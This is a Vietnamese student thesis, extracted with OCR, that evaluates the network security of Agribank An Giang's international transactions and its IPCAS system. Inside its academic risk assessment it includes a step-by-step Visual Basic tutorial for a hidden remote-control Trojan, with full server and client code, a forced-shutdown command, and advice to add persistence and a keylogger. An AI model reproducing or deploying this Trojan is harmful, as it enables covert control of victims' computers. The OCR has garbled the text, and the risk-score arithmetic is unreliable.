TRƢỜNG ĐẠI HỌC AN GIANG KHOA KINH TẾ - QUẢN TRỊ KINH DOANH SVTH: CHÂU TRẦN SƠN ĐIỀN ĐỀ TÀI CHUYÊN ĐỀ NĂM TƢ ĐÁNH GIÁ TÍNH AN TỒN TRONG GIAO DỊCH QUỐC TẾ THÔNG QUA MẠNG CỦA NGÂN HÀNG NÔNG NGHIỆP VÀ PHÁT TRIỂN NÔNG THÔN VIỆT NAM - CHI NHÁNH AN GIANG Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn MỤC LỤC CHƢƠNG 1: TỔNG QUAN 01 1.1 Cơ sở hình thành đề tài 01 1.2 Mục tiêu nghiên cứu 02 1.3 Phƣơng pháp nghiên cứu thu thập liệu 03 1.3.1 Phƣơng pháp nghiên cứu khám phá 03 1.3.2 Thu thập liệu 03 1.3.3 Xử lý liệu 03 1.3.4 Kết cấu báo cáo 03 1.3.5 Phƣơng pháp phân tích 03 1.4 Phạm vi nghiên cứu 04 1.5 Ý nghĩa nghiên cứu 04 CHƢƠNG 2: CƠ SỞ LÝ THUYẾT 05 2.1 Cơ sở lý thuyết 05 2.1.1 Tổng quan an ninh mạng 05 2.1.2 Chính sách bảo mật 05 2.1.3 Chữ ký số 06 2.1.4 Firewall 07 2.1.5 Khái niệm hack 07 2.1.6 Ảnh hƣởng hack 07 2.1.7 Thủ phạm hack 07 2.1.8 Các hình thức cơng phổ biến 08 2.1.9 Thanh toán T/T 09 2.2 Giới thiệu IPCAS 09 2.2.1 Phạm vi 10 2.2.2 Đặc điểm hệ thống 10 2.2.3 Kiến trúc IPCAS 10 CHƢƠNG 3: PHƢƠNG PHÁP NGHIÊN CỨU 13 3.1 Quy trình nghiên cứu 13 3.2 Phƣơng pháp nghiên cứu 13 3.2.1 Nghiên cứu sơ 13 3.2.2 Nghiên cứu chuyên sâu 13 GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn 3.3 Phạm vi thu thập liệu 15 3.3.1 Tiêu chí chọn lọc liệu 15 3.3.2 Xử lý liệu 15 3.4 Mơ hình nghiên cứu 16 3.5 Tiến trình nghiên cứu 17 CHƢƠNG 4: GIỚI THIỆU VỀ CÔNG TY 18 4.1 Giới thiệu ngân hàng nông nghiệp phát triển nông thôn Việt Nam (Aribank) 18 4.2 Sơ đồ tổ chức 19 4.3 Kết hoạt động kinh doanh (từ 2006 đến 2009) 21 4.4 Triển vọng phát triển an ninh mạng 21 CHƢƠNG 5: KẾT QUẢ NGHIÊN CỨU 22 5.1.Các thành phần an ninh có hệ thống giá trị an ninh thành phần hệ thống 22 5.2.Các yếu tố ảnh hƣởng đến an ninh hệ thống mức độ thiệt hại tƣơng ứng với yếu tố đƣợc khai thác 27 5.3.Tìm kiếm xác định rủi ro 29 5.3.1 Firewall 30 5.3.2 Hệ thống IDS/IPS – hệ thống IDS (Intrusion Detection System) 34 5.3.3 Antivirus 44 5.3.4 Hệ thống IPCAS 53 5.3.5 Đánh giá tổng thể 57 5.3.6 Thanh toán T/T hệ thống an ninh mạng vấn đề 58 CHƢƠNG 6: KẾT LUẬN VÀ KIẾN NGHỊ 59 6.1.Kết luận 59 6.2.Kiến nghị 59 PHỤ LỤC 61  Tài liệu tham khảo 61 GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn  Danh mục hình: Hình Số trang Hình Cấu trúc hệ thống IDS thơng thường 25 Hình Vị trí IDS hệ thống 25 Hình Một tool dùng công DDOS 38 Hình Một chương trình dị Ping đơn giản 42  Danh mục bảng Bảng Số trang Bảng Bảng kết hoạt động kinh doanh 21 Bảng Bảng lượng giá giá trị an ninh mạng 22 Bảng Bảng quy trình lượng giá an ninh mạng 30-31  Danh mục mơ hình Mơ hình Số trang Mơ hình Mơ hình lượng giá an ninh mạng 13 Mơ hình Mơ hình nghiên cứu 16 Mơ hình Sơ đồ hội đồng thành viên 20 GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thơn CHƢƠNG 1: TỔNG QUAN 1.1 Cơ sở hình thành đề tài: Giao dịch qua mạng xu phát triển nhiều nơi thề giới không nằm ngồi xu đó, ngân hàng Việt Nam bước thực nâng cao hình thức giao dịch Theo nghiên cứu sơ bộ: có ba hệ thống sử dụng giao dịch qua mạng hệ thống SWIFT, hệ thống chuyển tiền money gram hệ thống IPCAS  Trong SWIFT hệ thống có tính an tồn cao nhất, đảm nhiệm chức lưu thơng dịng tài tồn cầu, có tính bảo mật cao  Money gram nhà dịch vụ cung cấp dịch vụ chuyển tiền đến nơi, nhiên mang tính phục vụ cá nhân cao doanh nghiệp  IPCAS hệ thống quản lý tài lần đầu xuất Việt Nam, sử dụng ngân hàng nông nghiệp phát triển nơng thơn Do mang tính nội cao nên độ an toàn nghiên cứu sâu thêm làm Cả ba hệ thống có tính bảo mật khác lấy tảng công nghệ máy tính làm gốc với hệ thống mã hố, hệ thống mật khẩu, hệ thống chữ ký điện tử… Các hệ thống mã hoá mục tiêu tin tặc hàng đầu mà chúng lưu giữ đầu quan trọng mang lại nguồn lợi to lớn cho người đánh cắp Việc phá mã hố khơng thực khó khăn người nghĩ, hệ thống mã hố có chuỗi quy luật lặp lặp lại chuỗi quy luật bị phát bị phá vỡ toàn nguồn liệu bị mã hoá bị đánh cắp nguy hại bị phá huỷ hoàn toàn Hệ thống mật khẩu: khả an toàn mật thường chia làm hai phần, khách hàng (người tạo mật khẩu), nhà cung cấp dịch vụ (người lưu trữ mật xác thực xác giao dịch) phần đông bỏ qua người cung cấp trình tạo mật hay nhà cung cấp hệ thống thực giao dịch (phầm mềm có liên quan) mã nguồn hệ thống bị tung nhà cung cấp trở thành nguồn cung cấp mật cho tin tắc xâm nhập vào hệ thống cách trái phép Hệ thống chữ ký điện tử: nói cách khác chữ ký điện tử dạng mật cấp cao, nhà nước cơng nhận mang đầy đủ tính pháp nhân cá thể hay tổ chức Nhưng khơng mà nằm ngồi tầm quan sát tin tặc, khác nhà cung cấp chữ ký điện tử nhà nước, GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thơn điều đồng nghĩa với bạn cố tình xâm nhập bạn bị phạt nặng từ hành tới hình (tin tặc khơng có nghĩa bạn khơng sợ quyền – nói sâu thêm phần nội dung-“tâm lý tin tặc hay “hacker”) Tồn cầu hố trở thành điều hiển nhiên, tất yếu phát triển kinh tế, mà dịng tài khơng ngừng ln chuyển quốc gia thông qua đường internet với đầy rẫy hiểm hoạ Theo số liệu thống kê CERT (Computer Emegency Response Team) số lượng vụ công Internet thông báo cho tổ chức 200 vào năm 1989, khoảng 400 vào năm 1991, 1400 năm 1993 2241 năm 19941 Đi dùng xu để đề phịng rủi ro tương lai, ngân hàng nơng nghiệp phát triển nơng thơn nhanh chóng ứng dụng hệ thống IPCAS vào để giúp cho khách hàng yên tâm Tuy nhiên bên cạnh quy trình khác hay cơng đoạn khác thực an tồn hay chưa điều khơng chắn Với hệ thống khơng an tồn chuyện xảy đến thông tin khách hàng bị tiết lộ, từ thông tin nhỏ tên, địa chỉ, công ty, mã số tài khoản đến thông tin quan trọng mật hay số tiền tài khoản IPCAS thực gì? Hoạt động nào? Có ảnh hưởng đến hoạt động ngân hàng tại? thực độ an tồn nào? Để trả lời câu hỏi em làm đề tài để hiểu qua mang lại nhìn tổng qt tính an tồn giao dịch mạng ngân hàng nông nghiệp phát triển nông thôn Các hệ thống đƣợc lập để bảo vệ ngƣời sử dụng nhƣng đồng hành với phát triển hệ thống gia tăng tin tặc với phƣơng thức cách công ngày nguy hiểm Vậy phòng tránh xử lý gặp phải tin tặc ? Hiểu tin tặc gì, biết họ hành động nào, cho ta biết an toàn hệ thống ta 1.2 Mục tiêu nghiên cứu:  Nghiên cứu tính bảo mật ngân hàng, bao gồm hình thức bảo mật hệ thống IPCAS  Khảo sát mức độ hài lòng người sử dụng ngân hàng thời điểm tại, từ kiến nghị giải pháp để phát triển hệ thống GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn  Xác định xu phát triển tốn quốc tế thơng qua mạng Qua đánh giá tầm quan trọng tính an toàn độ bảo mật giao dịch  Đánh giá tính an tồn bảo mật ngân hàng nơng nghiệp phát triển nơng thơn, từ đưa kiến nghị để nâng cao độ bảo mật 1.3 Phƣơng pháp nghiên cứu thu thập liệu: 1.3.1 Phƣơng pháp nghiên cứu khám phá Phương pháp nghiên cứu khám phá: đánh giá mức an tồn, tính quan trọng toán trực tuyến từ thực tiển thị trường quốc tế 1.3.2 Thu thập liệu: lấy từ nguồn thứ cấp Do nghiên cứu chủ yếu thực máy tính mơi trường mạng, vài số liệu số liệu thô dưa hình thức kiểm tra an ninh mạng 1.3.3 Xử lý liệu: liệu thu thập xử lý lại thuật toán liệu chưa xử lý, với liệu xử lý từ báo cáo, đánh giá phân tích phương pháp lượng gia an ninh mạng theo dạng số liệu thành phần hệ thống Thống kê lại biểu đồ bảng kết 1.3.4 Kết cấu báo cáo: Chƣơng Tổng quan Giới thiệu đề tài nghiên cứu với lý thực đề tài, mục tiêu nghiên cứu, phương pháp nghiên cứu, ý nghĩa nghiên cứu, kết cấu nghiên cứu Chƣơng Cơ sở lý thuyết nội chung sở lý thuyết: giải thích mạng internet, lý thuyết an ning mạng, giới thiệu ngân hàng Nông nghiệp phát triển nơng thơn, từ lập mơ hình nghiên cứu Chƣơng Phương pháp nghiên cứu: phương pháp nghiên cứu sử dụng từ nghiên cứu sơ đến nghiên cứu chuyên sâu với phạm vi tìm số liệu, phương pháp phân tích Qua lập quy trình nghiên cứu Chƣơng Kết luận kiến nghị: trình bày giá trị thành phần an ninh mạng có hệ thống mục tiêu thống qua phân tích thực nghiên cứu, bảng biểu, kết từ thuật toán tổng hợp, từ đưa kiến nghị phát triển an ninh mạng ngân hàng cho tương lai Phụ lục: nguồn tài liệu tham khảo 1.3.5 Phƣơng pháp phân tích: dùng phương pháp lượng giá an ninh mạng để phân tích số liệu sử dụng biện pháp kỹ thuật mạng GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn (Penetration Testing) để nghiên cứu hệ thống xác định lỗ hổng bảo mật Phân tích tình hình phát triển tốn quốc tế trực tuyến ngân hàng Nông nghiệp phát triển nông thôn Việt Nam giai đoạn 2009-2011 1.4 Phạm vi nghiên cứu: Trong khoảng thời kỳ từ năm 2009 đến năm 2011, từ số liệu giao dịch đến số liệu thâm nhập hay tài khoản ảo 1.5 Ý nghĩa nghiên cứu: Làm sở cho kiến nghị phát triển an ninh mạng năm sau, khái quát trình phát triển an ninh mạng ngân hàng giai đoạn 2009-2011 làm tảng định hướng cho dự định kinh doanh mua bán lĩnh vực an ninh mạng tương lai GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn CHƢƠNG 2: CƠ SỞ LÝ THUYẾT 2.1 Cơ sở lý thuyết 2.1.1 Tổng quan an ninh mạng Khi bạn kết thúc công việc ngày, bạn rời công sở, tắt đèn phịng làm việc, tắt máy tính khố cửa lại, đương nhiên bạn có ngăn tủ riêng chứa tài liệu mật2 Máy tính bạn cần an ninh mạng máy tính hay hệ thống máy tính tương tự ổ khoá bạn vậy, khác điều bạn không khố đủ tất cổng vào, có mát bạn chẳng biết An ninh mạng ? An ninh mạng hay an ninh mạng máy tính tập hợp rào cản chương trỉnh bảo vệ hệ thống bạn khỏi đợt công phá hoại tin tặc Thường có ba dạng an ninh mạng chính: an ninh mạng, an ninh thơng tin, an ninh máy tính, an ninh liên mạng An ninh mạng thường dựa ba chức chính: bảo vệ thống trước cơng từ bên ngồi bên trong, đảm bảo tính riêng tư tất liên lạc tính thơng suốt từ đâu nào, kiểm soát người dùng hiệu quả, giúp hệ thống trở nên tin cậy mắt người dùng An ninh mạng thường dựa bốn phần (firewall, mã hố, chữ ký điện tử, chương trình chống virus) ba giải pháp (giải pháp phần cứng, giải pháp phần mềm, giải pháp người) Giải pháp phần cứng: giải pháp dựa thiết bị vật lý hệ thống máy tính riêng bao gồm máy chủ máy trạm, mạng riêng, đường truyền riêng Thông thường giải pháp phần cứng thường chung với hệ thống phầm mềm riêng Giải pháp phần mềm: giải pháp dựa phần mềm cài chạy hệ thống, giải pháp dạng đa dạng từ xác thực người, mã hố, tường lửa kiếm sốt (thơng tin chuyển) mạng Giải pháp người: giải pháp nhất, dựa hành lang pháp lý pháp luật chế tài hành vi tin tặc quy định công ty hay đơn vị việc sử dụng máy tính, quyền truy cập, quy định nhân 2.1.2 Chính sách bảo mật Chính sách bảo mật tập hợp quy định người dùng sử dụng hệ thống Đối với loại hệ thống phải có sách bảo mật khác nhau, sách bảo mật giúp người dùng biết vai trò trách nhiệm GVHD: Lê Phương Dung Trang SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thơn phần hệ thống, đồng thời giúp nhà quản trị tìm biện pháp bảo vệ hệ thống, cấu hình kiểm sốt hoạt động hệ thống  2.1.3 Chữ ký số Trong internet nước ta, có hai cách để chứng thực người mức độ tin cậy thơng tin máy tính Một Password, cách sử dụng tên truy nhập (User Name) mật (Password) cung cấp cho Form đăng nhập xác thực thông tin Thứ hai, dùng Digital Signature (chữ ký điện tử) “Chữ ký điện tử phương thức để đảm bảo xác thực tài liệu điện tử (E-mail, File text, bảng tính ) Chuẩn chữ ký điện tử DSS (Digital Signature Standard) tiêu chuẩn dựa dạng phương pháp mã hóa khóa cơng khai sử dụng thuật toán DSA (Digital Signature Algorithm), định dạng cho chữ ký điện tử chứng thực phủ Mỹ Thuật tốn DSA gồm có khóa riêng (Private Key) biết người chủ tài liệu khóa cơng khai (Public Key) mà cần biết.” Thứ vấn đề ký tài liệu Với chữ ký vật lý, phần tài liệu Tuy nhiên, chữ ký số không gắn theo kiểu thông thường chữ ký thật vào điện nên thuật tốn dùng phải “khơng thể nhìn thấy” theo cách điện Thứ hai vấn đề kiểm tra Chữ ký thông thường kiểm tra cách so sánh với chữ ký xác thực khác Khác với chữ ký thông thường chữ ký số kiểm tra nhờ dùng thuật tốn kiểm tra cơng khai Như vậy, kiểm tra chữ ký số Bản thân bạn người cấp cho hai khóa điện tử Public Key Private Key nêu Bạn phải giữ gìn Private Key cẩn thận giữ chìa khóa xe Khi có người dùng Public Key để mã hóa thư gửi cho bạn, bạn phải dùng Private Key để giải mã đọc thư Đồng nghiệp hay người thân bạn dù có biết thư chịu khơng tài giải mã Dùng Private Key, với phần mềm phù hợp, bạn ký tên lên văn hay tập tin liệu Chữ ký điện tử tương tự dấu độc vơ nhị dán lên văn bản, khó giả mạo Để ký lên văn bản, phần mềm ký tên bạn nghiền (crunch down) liệu để kết lại vài dòng, gọi thơng báo tóm tắt, tiến trình gọi “kỹ thuật băm” (hashing), tạo thành chữ ký điện tử Cuối cùng, phần mềm ký tên bạn gắn chữ ký điện tử vào văn Khi bạn gửi văn ký tên đến cho đồng nghiệp dùng Public Key giải mã chữ ký ngược trở lại thành thơng báo tóm tắt để biết có phải bạn ký tên vào văn hay không Đồng thời dùng phần mềm tạo thơng báo tóm tắt từ liệu văn so sánh với thơng báo tóm tắt bạn tạo GVHD: Lê Phương Dung Trang 10 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn Viết Trojan dễ dàng nhiều so với người nghĩ Tất thực cần hai chương trình ứng dụng đơn giản với nội dung 100 dịng mã lệnh Chương trình client, chương trình cho người sử dụng biết Chương trình thứ hai server, hay phần “trojan” thực Bây xem cần cho hai số ví dụ mẫu Server Server phần Trojan chương trình Nó cần phải giấu để người dùng bình thường khơng thể tìm thấy Để thực điều bạn bắt đầu cách sử dụng đoạn mã lệnh sau: Private Sub Form_Load() Me.Visible = False End Sub Đoạn mã làm cho chương trình khơng thể thấy mắt thường bị phát Task Manager Windows muốn chương trình ẩn tốt hơn, viết đoạn mã sau: Private Sub Form_Load() Me.Visible = False App.TaskVisible = False End Sub (Trong hệ điều hành Windows, tất chương trình có exe thể danh sách chương trình chạy Tuy nhiên chương trình bạn ẩn Running Applications List ) Bây có chương trình tàng hình người sử dụng bình thường, mà cần có bốn dịng lệnh Tuy nhiên cịn q đơn giản, làm cho tốt cách thêm vào số hàm Đầu tiên cho “nghe” kết nối xâm nhập vào máy, cần thêm vào điều khiển Winsock Control Tôi đặt tên cho điều khiển tơi “win” Cịn bạn đặt tuỳ ý Để làm cho Trojan "nghe" cổng 2999 khởi động, viết đoạn mã sau: Private Sub Form_Load() Me.Visible = False GVHD: Lê Phương Dung Trang 50 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub Đoạn mã thiết lập cổng mở cục tới cổng 2999, cổng mà gửi tới 445 Bây giờ, chương trình “nghe”, chưa làm điều rõ ràng Chúng ta thêm đoạn mã sau vào form chính: Private Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub Tiếp theo, viết hàm DoActions chương trình để gọi vào main form Đoạn mã thực hai nhiệm vụ: Đầu tiên làm cho tất yêu cầu kết nối tự động chấp nhận; tiếp làm cho tất liệu tự động chấp nhận sau chuyển toàn liệu sang cho hàm DoActions mà viết Hàm DoActions nên viết dạng public để chương trình ngồi modul dùng Thêm đoạn mã sau vào modul, làm việc với server Trojan: Public Function DoActions(x As String) Select Case x Case "msgbox" Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" Case "shutdown" shell "shutdown -s -f -t 00" GVHD: Lê Phương Dung Trang 51 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn End Select End Function Bây bạn có chương trình mà liệu “Msgbox” gửi tới cổng 2999, thể hộp tin nhắn msgbox máy tính nạn nhân Khi liệu “shutdown” gửi tới cổng 2999, tắt máy tính nạn nhân Tôi dùng câu lệnh “Select Case” để dễ dàng chỉnh sửa đoạn mã sau Xin chúc mừng, bạn vừa viết xong Trojan bạn Bây xem lại đoạn mã hoàn chỉnh Main Form Private Sub Form_Load() Me.Visible = False App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub Pivate Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub Hãy nhớ thêm điều khiển winsock đặt tên “win” bạn dùng đoạn mã này: Module Public Function DoActions(x As String) Select Case x Case "msgbox" Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" GVHD: Lê Phương Dung Trang 52 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn Case "shutdown" shell "shutdown -s -f -t 00" End Select End Function Tất phần Server Trojan Giờ xem xét đến phần Client Client Client mà bạn tương tác tới Bạn dùng để kết nối tới server từ xa (trojan) gửi cho lệnh Sau viết phần server chấp nhận câu lệnh “shutdown”, “msgbox”, tạo client gửi câu lệnh Tạo form thêm điều khiển Winsock Control, hộp text box bốn nút Trong đoạn mã hộp text box đặt tên txtIP, nút đặt tên cmdConnect, cmdMsgbox, cmdShutdown cmdDisconnect Đoạn mã sau: Private Sub cmdConnect_Click() IpAddy = txtIp.Text Win.Close Win.RemotePort = 2999 Win.RemoteHost = IpAddy Win.LocalPort = 9999 Win.Connect cmdConnect.Enabled = False End Sub Private Sub cmdDisconnect_Click() Win.Close cmdConnect.Enabled = True End Sub Private Sub cmdMsgbox_Click() Win.SendData "msgbox" End Sub GVHD: Lê Phương Dung Trang 53 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn Private Sub cmdShutdown_Click() Win.SendData "shutdown" End Sub Đó đoạn mã cho client Tất việc làm lấy địa IP từ txtIP kết nối với cổng từ xa 2999 Sau kết nối, bạn gửi liệu “shutdown” hay “msgbox” tới server hoạt động tương ứng thực (tắt máy tính hay thể hộp tin nhắn) Hai chương trình làm cải tiến nhanh chóng thành chức quản trị từ xa mạnh bạn biết bạn làm Tơi đề nghị nên cố gắng thêm loại điều khiển lỗi hàm cho client server Lời khuyên Hãy làm cho server tải file đặc tả người công Thêm mã lệnh để Server thực thi lúc khởi động (là khoá ghi) Và keylogger cho server – làm cho gửi thông tin cho người công Vậy trọng số D 80% khả phổ biến, cần người dùng muốn thâm nhập dễ dàng tìm thấy google với đầy đủ dạng virus đa phần giới virus có quy luật ngầm chương trình tải lên có virus hay trang hướng dẫn có trojan ẩn – muốn hại người khác bạn phải tự hại thân trước Điều phần làm chùng tay hacker vào nghề S3: với giá trị D ta tin khả ứng dụng kỹ thuật phức tạp, áp dụng được, cần lượng kiến thức máy tính lập trình ngôn ngữ chuyên sâu VB hay C++ để sử dụng kỹ thuật (ở tác giả nêu đơn giản nhất) Như trọng số S 20% cần có kiến thức nhiều máy tính đế thực hành thủ thuật Function SWE(r) p = lookupP(r,D) p = 5.80% => p = s = lookupS(r,D) s = 5.20% = > p = return p*swep+s*swes swep = 0,8 (khả bi công 80% với mức phổ biến cao trọng số D) swes = 0,2 (khả bị công 20% tương ứng với độ đơn giản S p*swep + s*swes = 3,4 GVHD: Lê Phương Dung Trang 54 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn end function Thiết lập hàm số biến số I: dựa mức độ thâm nhập đối tượng hệ thống, giá trị firewall hệ thống ta định lượng - hệ thống xem có lớp chính: lớp thứ firewall vịng ngồi, lớp thứ hai IDS, lớp thứ ba IPCAS lớp cuối nội antivirus, toàn hệ thống ta định lượng có độ tồn vẹn 100 phần tuỳ theo giá trị an ninh mà định lượng tham số I => I firewall 12,5 Function SE(pc) Function RiskRating(pc) R = FindRisk(pc) R = FindRisk(pc) R = (x,z,y,t,a) R = (x,z,y,t,a) For each r in R For each r in R swei = SWE(r) swei = SWE(r) swei = 3,4 swei = 3,4 sei = LookupI(r,D) sei = LookupI(r,D) sei = 5.125% => sei = 6,25 sei = 5.125% => sei = 6,25 end for end for return 5+ ∑(sei*swei) return ∑(sei*swei) ∑swei 5+ ∑(sei*swei) = 11,25 ∑swei ∑(sei*swei) = 6,25 ∑swei Endfunction ∑swei Endfunction Đánh giá: với số điểm đánh giá cuối 11,25 điểm cho giá trị an ninh, mức điểm đánh giá cao, với điểm tác giả cho sẵn cho thành phần nên giá trị đóng góp IDS cao Một thành phần an ninh nằm nội hệ thống có chức giám sát antivirus thực hồn thành chức Để hiểu antivirus có điểm đánh gía cao thế, ta xem lại đánh giá Bị thâm nhập từ bên ngồi (x): biến (x) ln khả dụng, để thả virus vào hệ thống bắt buộc hacker phải xâm nhập vào hệ thống, điều đồng nghĩa firewall IDS thất bại, với mức điểm an ninh mạng 6,5 8,5 với firewall IDS khả bị vượt qua không cao Mất sở liệu (y): với biến (x) khả dụng dẫn đến biến (y) khả dụng virus hồn tồn ăn cắp sở liệu chuyển qua máy hacker hay phá GVHD: Lê Phương Dung Trang 55 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn hoại toàn bộ, nhiên để làm điều cần bước từ biến (x) phải thắng hệ thống antivirus kasperky Không xác định người công (z): biến (z) khả dụng nói Bị vơ hiệu hố hệ thống (t): biến (t) khả dụng hai biến (x) (y) khả dụng, khả thành công cộng từ độ khả dụng hai biến (x) (y), thiệt hại xảy hệ thống gần kiểm sốt Lúc nhờ cảnh sát can thiệp mà May thay khả thành công với hệ thống mức độ hành động hacker Việt Nam thấp (nhưng cao với nước ngoài, nhiên mức hấp dẫn hệ thống với hacker nước thấp) Mất quyền điều hành hệ thống (a): biến (a) khó xảy cần ba biến (t) (x) (y) khả dụng, tức cảnh sát khơng làm được, vơ lý trừ người cơng hacker nước ngồi (khả cực thấp với độ hấp dẫn hệ thống tại) Với biến (x) khả dụng dẫn tới biến (y) khả dụng mức khả dụng giảm dần tới biến (a) ta có mức thiệt hại bị công 6,25 điểm cho thấy mức thiệt hại đáng kể Biến x khả dụng dẫn tới biến sau khả dụng mức khả dụng giảm dần cho thấy mức độ thiệt hại lớn giảm dần sau vào sâu việc thâm nhập hay phá hoại khó khăn 5.3.4 Hệ thống IPCAS Hàm tìm kiếm rủi ro: E: Phương thức hoạt động đơn giản IPCAS: cần có user mật đăng nhập được, nghe khó bạn cài trojan bước cần phải lo Độ bao quát cao: điều ngược lại bảng đánh giá giá trị an ninh thực trường hợp đặc biệt IPCAS dây nắm giữ nhiều liệu mà có q điều ràng buộc người dùng hệ thống khiến trở nên vơ giá trị mà mỏng manh vơ Vị trí hệ thống: chương trình mang tính bảo mật cao nên đặt máy chủ phịng điện tốn nằm sâu hệ thống, với SWIFT máy chủ nằm nước ngoài, máy cá nhân phần chương trình cung cấp từ máy chủ Function FindRisk(pc) + Bị thâm nhập từ bên (x) + Mất sở liệu (y) + Không xác định người công (z) GVHD: Lê Phương Dung Trang 56 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thơn + Bị vơ hiệu hố hệ thống (t) + Mất quyền điều hành hệ thống (a) + Bị dùng làm bình phong đợt cơng khác (i) + Rủi ro từ người dùng mang lại (n) R= O + Bị thâm nhập từ bên (x) + Mất sở liệu (y) + Không xác định người cơng (z) + Bị vơ hiệu hố hệ thống (t) + Mất quyền điều hành hệ thống (a) + Bị dùng làm bình phong đợt cơng khác (i) + Rủi ro từ người dùng mang lại (n) For each e in E + Bị thâm nhập từ bên (x) + Mất sở liệu (y) + Không xác định người công (z) + Bị vơ hiệu hố hệ thống (t) + Mất quyền điều hành hệ thống (a) + Bị dùng làm bình phong đợt cơng khác (i) + Rủi ro từ người dùng mang lại (n) If check (e) then Với giá trị to lớn IPCAS gần nắm giữ tất Aribank mang người rủi ro tiềm ẩn mà khố hệ thống có, dựa rủi ro mà phần hệ thống bảo mật có khai thác cơng vào rủi ro từ người dùng mang lại If attack (e) then Mức độ thiệt hại: vào hệ thống IPCAS nói bạn có tất mà bạn muốn biết aribank nước Việt Nam từ danh sách khách hàng, chứng từ giao dịch, tới số tài khoản,….nói cách khác IPCAS tất cả.(key) R=R U e + Bị thâm nhập từ bên (x) GVHD: Lê Phương Dung Trang 57 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn + Mất sở liệu (y) + Không xác định người cơng (z) + Bị vơ hiệu hố hệ thống (t) + Mất quyền điều hành hệ thống (a) + Bị dùng làm bình phong đợt cơng khác (i) + Rủi ro từ người dùng mang lại (n) End if Attack (key) = (test + test + test 3) End for R= End function Hàm tính tỷ lệ rủi ro D: tỷ lệ rủi ro IPCAS tính dựa tổng mức rủi ro mà hệ thống bảo mật mang lại, IPCAS khơng có chức bảo mật chun sâu (chỉ bảo mật đơn giản mật Vậy trọng số D (D1 + D2 + D3 )/3 % khả phổ biến, tức D = 73,33% S: tương tự D giá trị S dưa giá trị S hệ thống bảo mật phía trước Vậy trọng số S (S1 + S2 + S3 )/3 % khả phổ biến, tức S = 43,33% Function SWE(r) p = lookupP(r,D) p = 7.73,33% => p = 5,13 s = lookupS(r,D) s = 7.43,33% = > p = 3,03 return p*swep+s*swes swep = 0,73 (khả bi công 73,33% với mức phổ biến cao trọng số D) swes = 0,43 (khả bị công 43,33% tương ứng với độ đơn giản S) p*swep + s*swes = 5,05 end function Thiết lập hàm số biến số I: dựa mức độ thâm nhập đối tượng hệ thống, giá trị firewall hệ thống ta định lượng - hệ thống xem có GVHD: Lê Phương Dung Trang 58 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nơng thơn lớp chính: lớp thứ firewall vịng ngồi, lớp thứ hai IDS, lớp thứ ba IPCAS lớp cuối nội antivirus, tồn hệ thống ta định lượng có độ toàn vẹn 100 phần tuỳ theo giá trị an ninh mà định lượng tham số I => I IPCAS 15 ∑(sei*swei) = 10.5 Function SE(pc) ∑swei R = FindRisk(pc) Endfunction R=7 For each r in R swei = SWE(r) swei = 5,05 sei = LookupI(r,D) sei = 7.150% => sei = 10,5 end for return 5+ ∑(sei*swei) ∑swei 5+ ∑(sei*swei) = 15,5 ∑swei Endfunction Function RiskRating(pc) R = FindRisk(pc) R=7 For each r in R swei = SWE(r) swei = 5,05 sei = LookupI(r,D) sei = 7.150% => sei = 10,5 end for return ∑(sei*swei) ∑swei GVHD: Lê Phương Dung Trang 59 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng 